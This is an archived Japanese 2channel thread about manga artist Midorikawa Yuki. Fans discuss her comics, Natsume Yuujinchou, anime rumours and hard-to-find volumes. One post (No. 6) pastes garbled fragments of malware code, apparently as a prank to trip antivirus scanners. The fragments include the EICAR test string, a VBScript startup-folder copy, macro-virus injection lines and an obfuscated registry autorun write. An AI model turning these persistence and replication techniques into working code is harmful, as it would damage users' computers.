2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

緑川ゆき 8

1 :花と名無しさん:2007/10/20(土) 18:04:03 ID:???0
LaLa、LaLaDXで活躍中の緑川ゆきさんのスレッドです。
ゆっくり、まったりいきましょう。

*sage進行でお願いします*

前スレ
緑川ゆき 7
http://anime2.2ch.net/test/read.cgi/gcomic/1171122333/

過去スレ、コミックス・コミックス未収録作品は >>2-5あたり

2 :花と名無しさん:2007/10/20(土) 18:05:58 ID:???0
【過去スレ】

緑川ゆき 6
http://anime2.2ch.net/test/read.cgi/gcomic/1148310376
緑川ゆき 5
http://comic6.2ch.net/test/read.cgi/gcomic/1129474162
緑川ゆき 4
http://comic6.2ch.net/test/read.cgi/gcomic/1113225299
緑川ゆき 3
http://comic6.2ch.net/test/read.cgi/gcomic/1086242767
緑川ゆき 2
http://comic4.2ch.net/test/read.cgi/gcomic/1057761237
緑川ゆき「アツイヒビ」「あかく咲く声」
http://comic.2ch.net/test/read.cgi/gcomic/1024511776

過去スレ保管庫
http://gcomic2ch.hacca.jp/midorikawa/index.html

3 :花と名無しさん:2007/10/20(土) 18:07:00 ID:???0
【コミックス】
あかく咲く声 全3巻
 ・(2巻収録短編) 「花泥棒」、「珈琲ひらり」

アツイヒビ
 ・「アツイヒビ」、「花の跡」、「寒い日も。」、「名前のない客」

蛍火の杜へ
 ・「花唄流るる」、「蛍火の杜へ」、「くるくる落ち葉」、「ひび、深く」

緋色の椅子 全3巻

夏目友人帳 1〜4巻

4 :花と名無しさん:2007/10/20(土) 18:08:01 ID:???0
【コミックス未収録作品】
・夏にはため息をつく ララ2000年9月号 36P

・花追い人  1 ララ2001年4月号 巻頭カラー40P
        2 ララ2001年5月号 カラー35P
        3 ララ2001年6月号 40P

・体温のかけら ララ2003年8月号 カラー50P

・まなびやの隅 ララ2004年10月号 カラー50P

・暁の魔術師 ララDX2004年11月号 カラー50P

・星も見えない ララDX2005年3月号 50P

・夏目友人帳  16 ララ 2007年9月号 巻頭カラー50P
17 ララ 2007年10月号 31P
18 ララ 2007年11月号 31P
(特別編)ララDX 2007年11月号 16P


5 :花と名無しさん:2007/10/20(土) 18:18:33 ID:???0
/(^o^)\ズレタ

次スレからは↓こういう感じでお願いします


・夏目友人帳 16 ララ 2007年9月号 巻頭カラー50P
          17 ララ 2007年10月号 31P
          18 ララ 2007年11月号 31P
    (特別編) ララDX 2007年11月号 16P

6 :花と名無しさん:2007/10/20(土) 19:08:51 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


7 :花と名無しさん:2007/10/21(日) 00:52:02 ID:???0
>>1
スレ立て乙

8 :花と名無しさん:2007/10/21(日) 01:18:14 ID:???0
>>1
乙です。
ファンの皆さんにあかく咲く声が手に届くといいですね

9 :花と名無しさん:2007/10/21(日) 03:34:57 ID:???O
>>1

あかく咲くこえ欲しいっす

10 :花と名無しさん:2007/10/21(日) 06:23:12 ID:???0
1乙
レア情報で、デビュー同期はじつは田中メカさん
あかく咲く声で初期短編が収録されてるのは貴重だよね


11 :花と名無しさん:2007/10/21(日) 08:36:46 ID:???0
前スレ1000
確かに緑川さんの性格はビックリするほど真面目っぽい

くだけた感じがないけど、自分はすごく好きだな

12 :花と名無しさん:2007/10/21(日) 08:40:33 ID:???0
>>11
いい意味で擦れてない感じが好き。
だからこそ緑川世界が紡ぎ出されるのだと思う。

13 :花と名無しさん:2007/10/22(月) 01:18:26 ID:???O



14 :花と名無しさん:2007/10/22(月) 15:17:47 ID:???0
アニメ化決まった

15 :花と名無しさん:2007/10/22(月) 16:12:20 ID:???0
>>14
kwsk

16 :花と名無しさん:2007/10/22(月) 16:18:31 ID:???0
ほんとに??

17 :花と名無しさん:2007/10/22(月) 16:34:15 ID:???0
>>14
1月号が出るまではっきりわかんないでしょ。
それともアニメスタッフのリーク? だとしたら最低なやつ・・・

でも本当なら嬉しいな。

18 :花と名無しさん:2007/10/22(月) 17:08:44 ID:???0
LaLaスレで今、BIGニュースというのが何なのか?を予想していて
それで誰かが夏目アニメ化と言ってるのを>>14が真に受けただけだろ

19 :花と名無しさん:2007/10/22(月) 17:11:14 ID:???0
前からポソポソアニメ化話つぶやく人いるけど
気持ち悪い
夏目アニメ化したらパクリ騒ぐ奴が増えてナイーブになるわ

20 :花と名無しさん:2007/10/22(月) 18:41:08 ID:???0
>19
ナイーブじゃなくて、多分ナーバスだよね?
ま、気持ちはわからなくも無いが、ちょっと楽しみかも

21 :花と名無しさん:2007/10/23(火) 00:58:56 ID:???0
つか四巻しか出てないのにアニメ化できるもんなのか?

22 :花と名無しさん:2007/10/23(火) 01:43:49 ID:???0
ガセだからさーもういいじゃん
紅茶王子みたいに、選考に残っただけで決まったと言いふらすあほもいるし
(紅茶は作者がソレをしてイタタだったけど)

23 :花と名無しさん:2007/10/23(火) 02:33:08 ID:???O
普通に考えてないよな>アニメ化
原作のストック少ないし、ララには他にもっと売れてて
アニメ化してない作品があるんだからするならそっちをアニメ化するだろうし

24 :花と名無しさん:2007/10/23(火) 02:37:23 ID:???0
>>23
まあ、普通そうだよね。ホッ…

25 :花と名無しさん:2007/10/23(火) 09:43:50 ID:???0
ありそうなのはCDドラマ化くらいだろうけど。>夏目
ぶっちゃけ、夏目がアニメ化されても原作よりいい物を作ってくれるとは思えないし
アニメ向きだとも思えない。

正直なところ中途半端にアニメ化されていろいろ言われて緑川さんが大変になるより
現状のままでいい。

26 :花と名無しさん:2007/10/23(火) 10:11:59 ID:???0
ドラマCD化はもうしてるじゃん
ふろくじゃなくて販売ってことか?

27 :花と名無しさん:2007/10/23(火) 13:49:53 ID:???0
アニメになると、内容はともかく、絵がすごく変わりそうだから微妙

28 :花と名無しさん:2007/10/23(火) 13:56:53 ID:???0
>>26
そうそう。言葉足りなくてごめんね。

なんだか、本スレですごく盛り上がってるけど、スペシャル企画だかなんだかは
夏目関係じゃないような気がする。
夏目関係だったら、本誌短期連載した夏のほうが盛り上がっただろうし。

29 :花と名無しさん:2007/10/23(火) 19:28:27 ID:???0
ぼく地球並のクオリティでOVAだったらちょっと見てみたいけどな

30 ::2007/10/23(火) 20:08:30 ID:2qJXtVn2O
やっと図書カードが来た!すごく嬉しい!!宝物にしよう

31 :花と名無しさん:2007/10/23(火) 20:14:59 ID:???0
>>30
チラシの裏にでも書いてろ

32 :花と名無しさん:2007/10/23(火) 23:37:02 ID:???0
>>31
素直に「妬ましい」って書けばいいのに

33 :花と名無しさん:2007/10/24(水) 00:24:49 ID:???0
まぁまぁ
>>30 おめでと!本誌のやつかな?

ニャンコ先生マスコットははずれてもいいから生で見てみたいよ
ニャンコ先生と唐草な柄の手拭いとかあればいいのにな

34 :花と名無しさん:2007/10/24(水) 00:25:39 ID:???O
>>30
前スレでまだこないって書いてた人かな?
無事届いてよかったね、当選オメ!

35 :花と名無しさん:2007/10/24(水) 02:04:37 ID:???0
というか、いちいち2ちゃんで報告する意味がわからないよ
このスレの人たちなんでこんななんだ?w親切すぎるだろ…

36 :花と名無しさん:2007/10/24(水) 04:46:21 ID:???0
>>30
コテつけてしかもageてるって何なの?


37 :花と名無しさん:2007/10/24(水) 10:33:43 ID:???O
別に喜びを書いただけだから良くないか?
他作品の話でもスレ違い内容でもないし。

38 :花と名無しさん:2007/10/24(水) 10:52:23 ID:???0
>親切すぎるだろ…
このスレを見ると、いい作品にはいいファンがつくもんだなーとは思う

そういえばLaLa9月号にはニャンコ先生福笑いが付いてたんだよなwww
そういう事があるからやっぱり本誌連載は嬉しい

39 :花と名無しさん:2007/10/24(水) 12:07:10 ID:???0
自画自賛ですか?としか…

40 :花と名無しさん:2007/10/24(水) 12:10:43 ID:???0
そろそろスルーで

本誌に掲載されると関連記事もちょくちょく載るからいいよね
11月号のもっと本を読もうのコーナーとか
DXだと最終話掲載号に、その後の緋色の椅子とかって感じのカットが載ってたのを思い出した
切り取り忘れて捨ててしまったんだよなあ

41 :花と名無しさん:2007/10/24(水) 12:34:03 ID:???O
正直、夏目飽きてきたな…
新作読みたい

42 :花と名無しさん:2007/10/24(水) 13:38:34 ID:???0
>>41
次号の寺でレイコさん話がくるから、少しは動きがあると思うよ>夏目

43 :花と名無しさん:2007/10/26(金) 22:00:06 ID:???0
過疎ってる?
付録のドラマCDてオクにも出てないかな…

44 :花と名無しさん:2007/10/26(金) 22:18:35 ID:???0
買いそびれたの?
ついこの間まで、結構出てたけどもう出てないかな。

45 :花と名無しさん:2007/10/26(金) 22:35:02 ID:???0
おお即レスありがとう>>44
気長にさがすよ…

46 :花と名無しさん:2007/10/26(金) 23:55:27 ID:???0
これは余計なお世話だと思うが、ニコニコ動画ってサイトにうpされてる>ドラマCD

47 :花と名無しさん:2007/10/27(土) 00:04:34 ID:???0
これは余計なお世話だと思うが、46は半年ぐらいROMった方がいいと思うよ

48 :花と名無しさん:2007/10/27(土) 00:11:34 ID:???0
これ余計なレスだと思うが、ありがとう46

49 :花と名無しさん:2007/10/27(土) 00:21:06 ID:???0
これは余計な感想だと思うが、>>46-48の流れにワラタ

50 :花と名無しさん:2007/10/27(土) 00:36:31 ID:???O
>>45
出版社に在庫有れば取り寄せてもらえるよ
問い合わせてみれば?

51 :花と名無しさん:2007/10/27(土) 06:08:02 ID:???0
>>50
そんな事できるんだ!知らなかった
皆情報ありがとー


52 :花と名無しさん:2007/10/29(月) 01:58:34 ID:???O
そのうちでかい発表があるかも・・・
頓挫しなければ・・・

53 :花と名無しさん:2007/10/29(月) 02:06:11 ID:???0
>>52
なんの発表だか知らないけど、関係者?
許可が無いならリークはやめれ。緑川さんとか周りが迷惑するだろ。


54 :53:2007/10/29(月) 02:12:33 ID:???0
ごめん、神経質過ぎました。
(52のような誘い受けっぽい書き込み、なんかちょっとアレで…)
スレの雰囲気悪くしてたらすみません。

55 :52:2007/10/29(月) 02:19:05 ID:???O
すまん。誤爆った。
こことは関係ない話題だった。

56 :53:2007/10/29(月) 02:23:01 ID:???0
自分の脊髄反射に自己嫌悪…orz
ごばっくだったのですね。すみません…修行してきます。

57 :花と名無しさん:2007/10/29(月) 06:02:59 ID:???0
>>56
その反応は間違ってないと思うよ。
緑川さんが迷惑するのは嫌だもの。

58 :花と名無しさん:2007/10/29(月) 07:39:00 ID:???O
誘い受けってなに?

59 :花と名無しさん:2007/10/29(月) 10:34:24 ID:???0
自分で調べろ

60 :花と名無しさん:2007/10/29(月) 17:41:54 ID:???O
むしゃくしやしていてやった
腐女子なら誰でもよかった
今は反省している

61 :花と名無しさん:2007/10/29(月) 22:13:39 ID:???0
ニャンコ先生ぽいデザインの招き猫どこかにないもんかね

62 :花と名無しさん:2007/10/29(月) 22:16:26 ID:???0
紙粘土で作れば良いんだよ。

そんで割れば良(ry

63 :花と名無しさん:2007/11/02(金) 04:22:03 ID:???O
ほっしゅ

64 :花と名無しさん:2007/11/02(金) 14:39:46 ID:???0
>>51
亀だがアマゾンで過去の雑誌が買えた気がする
いまだにCD聞いてない。損か得かよくわからないな

65 :花と名無しさん:2007/11/02(金) 18:22:26 ID:???0
>>64
それは中古なんでは…
中古なのにプレミアとか言って定価より上乗せして
ぼったくり価格にしてるのが多いからオススメできない

自分はもう聞き飽きたのでいらないけど
2で身バレはしたくないからなぁ

66 :花と名無しさん:2007/11/04(日) 04:41:50 ID:???O
ニャンコ先生萌えほしゅ

67 :花と名無しさん:2007/11/05(月) 17:03:14 ID:???0
思い切って書く 身バレ覚悟

自分はネット上で身バレしている
白癬関連で出品されている商品の、かなりの情報を持っている人がネットの知り合いにいた
ネット上であらゆる手段を使って、個人情報までもその人は収集している
出品年月・落札価格・所在地は完璧に網羅されていた。
過去に4つIDを持ったけど、そのうち3つがその人に特定され、
落札出品したすべての情報を、今も保管されている
1つのIDだけ気づかれなかったけど、それも自信ない

一度あなたの住んでいるところに観光に行くので会いましょうと言われて怖かった

だから迷わず普通に本屋で買うのが絶対いい。

68 :花と名無しさん:2007/11/05(月) 18:47:08 ID:???0
ニャンコ先生を湯たんぽ代わりにして寝たい

69 :花と名無しさん:2007/11/05(月) 21:46:01 ID:???0
>>67
下心ありで少女漫画を出品してる男もいるから気をつけたほうが良いよ。
ネットオークションって、安い反面、赤の他人にプライバシーを教える
というリスクがあるよ。この事に触れる人が少ないけど、業者を相手に
するより個人の方が余程リスクが高い。

70 :花と名無しさん:2007/11/06(火) 00:31:02 ID:???0
>67&69
誰も食いつかないからって自演はやめようねw
ここに投下するより、LaLaスレとか白癬関係のスレに投下したら?
ここよりももっと喚起できるよ。わざわざここですることじゃない

71 :花と名無しさん:2007/11/06(火) 16:08:45 ID:???0
世界観好きだな

72 :花と名無しさん:2007/11/06(火) 18:17:01 ID:???O
にゃんこ萌え
かつてない萌え

73 :花と名無しさん:2007/11/07(水) 08:13:45 ID:???0
>>67
・・・おまえ、落札物の検索サイトがあるのしらないのか

74 :花と名無しさん:2007/11/08(木) 22:41:33 ID:???O
好きじゃ、ニャンコ先生…しびれるほどに。

75 :花と名無しさん:2007/11/08(木) 23:50:12 ID:???0
>>74
キ、キムタク!?

76 :花と名無しさん:2007/11/09(金) 00:26:42 ID:???O
ニャンコ先生から猛虎魂を感じるで!!

77 :花と名無しさん:2007/11/11(日) 12:27:07 ID:???O
ぷーぷー

78 :花と名無しさん:2007/11/11(日) 23:35:28 ID:???0
夏目以外のコミックスがどこにも売ってなくて、
たまたま旅行に行った時に上野の本屋で『蛍火の杜へ 』ゲット。
待ち合わせの友達が来るまで読んで、あまりに感動したのでそのまま友達に貸した。

友達も私と同じところで泣いてくれたらしい。
あー早く他のコミックスも読みたい。

79 :花と名無しさん:2007/11/11(日) 23:59:22 ID:???0
上野って駅中かな?グッジョブだな上野

80 :花と名無しさん:2007/11/12(月) 00:51:27 ID:???0
ブクオフちまちまと覗いてついに既刊全部揃ったぜ
他の住人たちもがんばれ

あと上野の本屋GJ

81 :花と名無しさん:2007/11/14(水) 05:20:11 ID:???O
蛍火は結構本屋に置いてあるんだよな、だが他が壊滅的にない(夏目除く)

82 :花と名無しさん:2007/11/14(水) 13:41:23 ID:???0
昨日あかくを読み直してて、刷らない理由が分かった気がする
でも中古で買って汚いから綺麗なのほしい

83 :花と名無しさん:2007/11/14(水) 16:06:20 ID:???0
え?刷らない理由ってなんだろ…
なんか問題になりそうな描写でもあったっけか

84 :花と名無しさん:2007/11/14(水) 16:15:47 ID:???0
よく分からんけど、>>82のように含みを持たせながら独りで納得している書き込みは迷惑千万。

85 :花と名無しさん:2007/11/14(水) 19:15:38 ID:???0
そんな棘のこもった言い方せんでも…
ただの誘い受けじゃないか

86 :花と名無しさん:2007/11/14(水) 19:33:08 ID:???0
誘い受けに慣れたくはないなw

87 :花と名無しさん:2007/11/17(土) 05:43:02 ID:???O
保守

88 :花と名無しさん:2007/11/18(日) 18:27:07 ID:???O
夏目をこれまで本誌読みだったから、単行本買おうかと思って本屋行った。

ま行のとこ見て「ない!!」てショック受けてたら、目の前に平積みされてたww

激しく嬉しかった。

89 :花と名無しさん:2007/11/18(日) 20:42:50 ID:???0
>88
お前さん可愛いな

90 :花と名無しさん:2007/11/19(月) 09:36:19 ID:???O
88だが、>89、d。

平積みにされてることがこの上なく嬉しかったんだw

で、他の作品を探してる皆さん、夏目の帯に「全て絶賛発売中!!」て書かれてるから、注文とかもありかも。
自分としては「あかく〜」も大好きだ。
読める人が増えると何となく嬉しいw

91 :花と名無しさん:2007/11/20(火) 10:42:54 ID:???O
>>90
あかく咲く声とアツイヒビは白泉に在庫無いからむりポ(´・ω・`)
緋色の椅子と蛍火は注文できるみたいだが。

92 :花と名無しさん:2007/11/21(水) 01:49:12 ID:???O
あかくとかずっと出版社にも在庫ないから注文できませんだからな
いい加減にしてくれ
アツイヒビは知らんけど

93 :花と名無しさん:2007/11/21(水) 12:12:51 ID:???0
通常なら売れた作家の過去作品増刷するよね?
特に夏目はかなり売れてるわけだし。何か理由でもあるのかな。
夏目から緑川さんをしったにわかファンだから、過去作品読みたいよ。

94 :花と名無しさん:2007/11/21(水) 12:37:45 ID:???0
あかく3冊+アツイで文庫2冊発売。
これしかない

95 :花と名無しさん:2007/11/21(水) 14:05:49 ID:???0
文庫化の話が進んでるかも、とは思う

96 :花と名無しさん:2007/11/21(水) 18:12:59 ID:???O
>>93
夏目はかなり売れてるとまではいかない
そこそこ売れてる、寺掲載作品にしては売れてるってかんじ
自分は姉がコミクス持ってるから文庫化したら自分で揃えたいな

97 :花と名無しさん:2007/11/23(金) 00:08:54 ID:???O
重版したとしても置く本屋は少ないと思う
出たのは結構前なんだし

98 :花と名無しさん:2007/11/23(金) 15:37:19 ID:???O
しゃばけ見てみようかな…妖怪が友人の若旦那って…

99 :花と名無しさん:2007/11/24(土) 04:24:48 ID:???0
しゃばけ気になるw
皆年賀状は見てないの?ニャンコ先生がねずみの着ぐるみですよ

100 :花と名無しさん:2007/11/24(土) 08:16:05 ID:???0
>>99
mjd?
新年からニャンコ先生なんて、何かご利益がありそうだね

というか、しゃばけが予想以上に凄いwwwww
「祖母の集めた怪が友達の、心優しい若旦那の物語」だってさ

101 :花と名無しさん:2007/11/24(土) 10:01:09 ID:???0
しゃばけのほうが先でしょ

102 :花と名無しさん:2007/11/24(土) 12:00:55 ID:???O
しゃばけ何気に楽しみ。
夏目はないだろうけどもし映像化されたらどうなるのか見てみたい。
朴訥な男の子が夏目を演じてくれるものならちょっと見てみたいな。

今さらだけどドラマCD聞いたよ
名取さんや柊が出る話しでまたやって欲しいな。

103 :花と名無しさん:2007/11/25(日) 01:00:26 ID:???O
昔あかくの2巻にアイスを豪快に落として泣いた。
まだ普通に売ってた頃だったから買い直せたけど。

104 :花と名無しさん:2007/11/25(日) 13:34:31 ID:???0
緋色の椅子1、3巻をアマゾンで購入したんだけど
スピード感や世界観が楽しめて面白かった。

どっちも2007年2月の刷なんだけど、1巻は第5刷、3巻に至っては第2刷。(売れてねえ・・)
これって夏目人気に引っ張られて売上が伸びたのか
編集部が判断したのか増刷したって感じなのかな。

でも他の作品は売上がのびようにも売ってないし、夏目がよっぽど人気ないと出なさそう。。
文庫版はそれでも出るもんなのかな。

105 :花と名無しさん:2007/11/25(日) 18:25:23 ID:???0
本屋行ったら緑川ゆきフェアと銘打って
緋色1〜3と夏目1〜4が平積みにしてあった。
さすがにあかくとアツイヒビはなかったけど蛍火は棚に一冊。
ひょっとしたら在庫整理をかねてとかかもしれないけど
じわじわと売れてるんじゃないかと思いたい。

106 :花と名無しさん:2007/11/26(月) 10:14:58 ID:???0
正直なところ、緑川さんはコミックスの表紙だけで売れる作家ではないと思うんだよね。
少女漫画特有の華やかさがなくて。
それだけに読むと内容の深さにはまるんだけど。

だからこそ、編集部のプッシュがまだ足りないと思う。
書店でフェアとか展開してくれるんだから、1話丸まる小冊子みたいなの作ってほしい。
新規が立ち読みできるくらいのをぜひ!
雑誌も紐でくくられてて立ち読みできる機会がないだから・・・とぼやいてみる。

107 :花と名無しさん:2007/11/26(月) 17:16:52 ID:???0
緑川さんは根強いファンが多くいそう。
夏目ファンと緑川ファンのどちらが多いのか分からないけど
最終的に息の長い作家になりそう

無理にプッシュすると微妙だからこのままでいいかな
表紙に1回なるだけで、相当プッシュになってるよ。
巻頭ならそこそこ任されてるし

108 :花と名無しさん:2007/11/27(火) 00:13:33 ID:???O
確かに立ち読みいいかもねー。
今となっては絵かなり好きだけど。

ところで緑川さんがパソコンで絵をかきたいって書いてるのを見て

え,それはやめて(・∀・;)

と思ったのは私だけ?

109 :花と名無しさん:2007/11/27(火) 00:18:21 ID:???0
え?そんなこと書いてたのか。
うーん…想像が出来ないなあ。

110 :花と名無しさん:2007/11/27(火) 11:40:11 ID:???0
うーん。デジタルになると緑川さんの良いところがなくなるような気がする。
あの微妙に慣れてなさそうな色使いというか筆使いも緑川さんの味だと思ってるから。

111 :花と名無しさん:2007/11/29(木) 12:10:40 ID:???O



112 :花と名無しさん:2007/12/01(土) 09:47:41 ID:???O
人がいないな

113 :花と名無しさん:2007/12/01(土) 09:59:27 ID:???0
新作が出るまでネタがないからね〜。
次回はレイコさんのお話なんだよね?楽しみだ!!

114 :花と名無しさん:2007/12/02(日) 18:45:23 ID:???O
>113
レイコさんの話かー、楽しみだw

夏目読んでると、レイコさんやニャンコ先生の話も読みたいなー、て思っちゃうんだよね。

特にレイコさんの恋話が読んでみたい…。夏目のじーちゃんは誰だwww

115 :花と名無しさん:2007/12/02(日) 19:03:12 ID:???0
妖に無理矢理孕まされたとかあるのかな

116 :花と名無しさん:2007/12/03(月) 11:13:58 ID:???0
えぐい話は描かなさそうなイメージ。>緑川さん

117 :花と名無しさん:2007/12/03(月) 12:09:36 ID:???0
>>115
緑川さんがそんな話描いたら自分ショック死するわ

118 :花と名無しさん:2007/12/03(月) 17:24:47 ID:???0
緑川さん以前にLaLaの限界があるぽ

無理矢理じゃなくて、恋愛の延長線上のハーフとかならあるかもしれないね

119 :花と名無しさん:2007/12/03(月) 19:42:55 ID:???0
>>118
同じ白線の花夢でレーイプあったよ
結局は女は男が前から好きだったので同意の上でということにしてたけど

120 :花と名無しさん:2007/12/03(月) 21:48:07 ID:???0
まおたんか

121 :花と名無しさん:2007/12/03(月) 22:21:56 ID:???0
まおたんは、全然同意でもないし好きでもなかったわけだな

24 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)